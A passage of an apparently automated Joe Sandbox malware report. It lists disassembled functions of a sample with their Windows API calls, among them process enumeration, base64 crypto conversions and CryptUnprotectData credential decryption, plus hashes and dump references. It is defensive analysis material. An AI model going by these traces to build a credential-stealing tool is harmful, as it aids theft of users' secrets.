                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 1AW_$P*]-$WI/o$kavm
                                • API String ID: 0-2141188312
                                • Opcode ID: 659c5719d6ca5a8276ecdae73c482f3dabe6ed71b217375d1857ccd5dc697de3
                                • Instruction ID: 04c75d055327a239765ead7401d18bf2cad6e16e6c4b65bff2f8f945bb74a6b4
                                • Opcode Fuzzy Hash: 659c5719d6ca5a8276ecdae73c482f3dabe6ed71b217375d1857ccd5dc697de3
                                • Instruction Fuzzy Hash: 75B217F360C2009FE704AE2DEC8567ABBE9EFD4320F1A463DE6C4C7744EA7558058696
                                Function 004F3A50 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004F71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004F71FE
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004F3A96
                                • Process32First.KERNEL32(00000000,00000128), ref: 004F3AA9
                                • Process32Next.KERNEL32(00000000,00000128), ref: 004F3ABF
                                  • Part of subcall function 004F7310: lstrlen.KERNEL32(------,004D5BEB), ref: 004F731B
                                  • Part of subcall function 004F7310: lstrcpy.KERNEL32(00000000), ref: 004F733F
                                  • Part of subcall function 004F7310: lstrcat.KERNEL32(?,------), ref: 004F7349
                                  • Part of subcall function 004F7280: lstrcpy.KERNEL32(00000000), ref: 004F72AE
                                • CloseHandle.KERNEL32(00000000), ref: 004F3BF7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: b59e5930e4c223f63380b8cc869c1bfabee7e777e87e98897c0faf87d71793f7
                                • Instruction ID: a4119af28f3e19fe33b37615fbc9f11e5b427be20cab9f7c924e6da0abf4c99f
                                • Opcode Fuzzy Hash: b59e5930e4c223f63380b8cc869c1bfabee7e777e87e98897c0faf87d71793f7
                                • Instruction Fuzzy Hash: 2A810871900209CFC714CF19C958BA6B7B1FB44319F29C1AAD5089B3B2D77AAD82CF48
                                Function 004DEA30 Relevance: 6.1, APIs: 4, Instructions: 98stringencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 004DEA76
                                • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 004DEA7E
                                • lstrcat.KERNEL32(004FCFEC,004FCFEC), ref: 004DEB27
                                • lstrcat.KERNEL32(004FCFEC,004FCFEC), ref: 004DEB49
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                • Opcode ID: 6c15a69847f60619809947bdf8985025a1855a7308b827079464ba3a9cb66068
                                • Instruction ID: c2c02da8fff68b34bf47e98b8559cd93644372c87051cd7473c43e4b6bc283e5
                                • Opcode Fuzzy Hash: 6c15a69847f60619809947bdf8985025a1855a7308b827079464ba3a9cb66068
                                • Instruction Fuzzy Hash: 3331D575A0011DEBDB10DB58EC45FEFB77DDF44705F008166FA09E6280DBB46A048BAA
                                Function 004F40B0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 004F40CD
                                • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 004F40DC
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004F40E3
                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 004F4113
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptHeapString$AllocateProcess
                                • String ID:
                                • API String ID: 3825993179-0
                                • Opcode ID: 4a5ee60e4c133035a3d535e8c5b4938606cbf43cf5cea521a7d7b1308509f68a
                                • Instruction ID: e05d86601126a2685c6376b6be4e811986aca5cbf80144097bedd532bfb4afe5
                                • Opcode Fuzzy Hash: 4a5ee60e4c133035a3d535e8c5b4938606cbf43cf5cea521a7d7b1308509f68a
                                • Instruction Fuzzy Hash: F4011E70600209AFDB109FA5DC85B6BBBADEF85311F108159BE49C7350DE759940CB59
                                Function 004F2B60 Relevance: 6.0, APIs: 4, Instructions: 48memorytimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,004FA3D0,000000FF), ref: 004F2B8F
                                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 004F2B96
                                • GetLocalTime.KERNEL32(?,?,00000000,004FA3D0,000000FF), ref: 004F2BA2
                                • wsprintfA.USER32 ref: 004F2BCE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: ab58e589f2b3fa85e449932bccc0915f082e6730fcd5cc396de99a442b0d20ad
                                • Instruction ID: 21c03d9e9ab3ab5a24f34337c0719f433497c4f6a1a059135681d1c7c46c35c0
                                • Opcode Fuzzy Hash: ab58e589f2b3fa85e449932bccc0915f082e6730fcd5cc396de99a442b0d20ad
                                • Instruction Fuzzy Hash: 61012DB2904529EBCB149BD9DD45BBFB7BCFB4CB11F00421AFA45A2290EA7C5440C7B5
                                Function 004D9B20 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 004D9B3B
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 004D9B4A
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 004D9B61
                                • LocalFree.KERNEL32 ref: 004D9B70
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID:
                                • API String ID: 4291131564-0
                                • Opcode ID: 3213c834c0f3d90d487b8b5ee8709761db284b5607329075204299cfd6022bbf
                                • Instruction ID: 970506dae17401234e7e47f3b73d43f71fc959ca7eccf684225b0db7f157d624
                                • Opcode Fuzzy Hash: 3213c834c0f3d90d487b8b5ee8709761db284b5607329075204299cfd6022bbf
                                • Instruction Fuzzy Hash: 50F01D70340312BBE7301F64AC59F677BA8EF04B50F214116FA45EA3D0DBB89C40CAA8
                                Function 004ECAE0 Relevance: 4.6, APIs: 3, Instructions: 89comstringCOMMON
                                Download Yara Rule
                                APIs
                                • CoCreateInstance.COMBASE(004FB110,00000000,00000001,004FB100,?), ref: 004ECB06
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 004ECB46
                                • lstrcpyn.KERNEL32(?,?,00000104), ref: 004ECBC9
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                • String ID:
                                • API String ID: 1940255200-0
                                • Opcode ID: ec54e3524ccb101657db0bb6632c7ee90a7560af4918c44e53998459bf415810
                                • Instruction ID: 8460c77bb7d72d10f94cc5a5c16bdaa9c5cc20d710e70ed00eb2c9e9ee2cbbb0
                                • Opcode Fuzzy Hash: ec54e3524ccb101657db0bb6632c7ee90a7560af4918c44e53998459bf415810
                                • Instruction Fuzzy Hash: 37316471A40619AFD710DB94CC82FAAB7B9DB88B11F1042C5FA14EB2D0D7B4BE45CB94
                                Function 004D9B80 Relevance: 4.5, APIs: 3, Instructions: 44memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004D9B9F
                                • LocalAlloc.KERNEL32(00000040,?), ref: 004D9BB3
                                • LocalFree.KERNEL32(?), ref: 004D9BD7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: d136809ae2e9571a076ef7cf07a377d2790a60c624c3eeb22bf6f14d86eca57c
                                • Instruction ID: 38db589c3afbb423155af7c56f24f5c9c0e23891980780b85e1fd44002a25546
                                • Opcode Fuzzy Hash: d136809ae2e9571a076ef7cf07a377d2790a60c624c3eeb22bf6f14d86eca57c
                                • Instruction Fuzzy Hash: 71011275A4120AABD710DBA4DC55FABB778EB44700F104555EA05EB381DB74AD0087D5
                                Function 0089E4D0 Relevance: 4.2, Strings: 2, Instructions: 1678COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 1:{$??_
                                • API String ID: 0-2247555130
                                • Opcode ID: efba66dfaccaf5b15280351383005aed5acb1181aa6030f2074af2fe9e50eeac
                                • Instruction ID: 4ce4203b6b7bac496bcb8775df8be4c861d53aecf6ffafa66d951ebb9069f49c
                                • Opcode Fuzzy Hash: efba66dfaccaf5b15280351383005aed5acb1181aa6030f2074af2fe9e50eeac
                                • Instruction Fuzzy Hash: 16B228B360C2049FD3046E29EC8567AFBE9EFD4720F1A8A3DE6C487744EA3558058697
                                Function 007AB6F0 Relevance: 4.0, Strings: 3, Instructions: 212COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: %)$DpK$l2{
                                • API String ID: 0-4148513593
                                • Opcode ID: 220431d182ed26140c0fae5b0bf2434d5a43c9a7adcf426c98421f9a5e97f0b0
                                • Instruction ID: b2a61d078fb6f8998e908161eec1565d0b3d038bedaefe862e8714d5752bf6f1
                                • Opcode Fuzzy Hash: 220431d182ed26140c0fae5b0bf2434d5a43c9a7adcf426c98421f9a5e97f0b0
                                • Instruction Fuzzy Hash: B16129F3E082105FF3049A2CED4176AB6D7EBD4720F2A863DEA88C77C4E93D59054696
                                Function 008768A6 Relevance: 2.7, Strings: 2, Instructions: 225COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
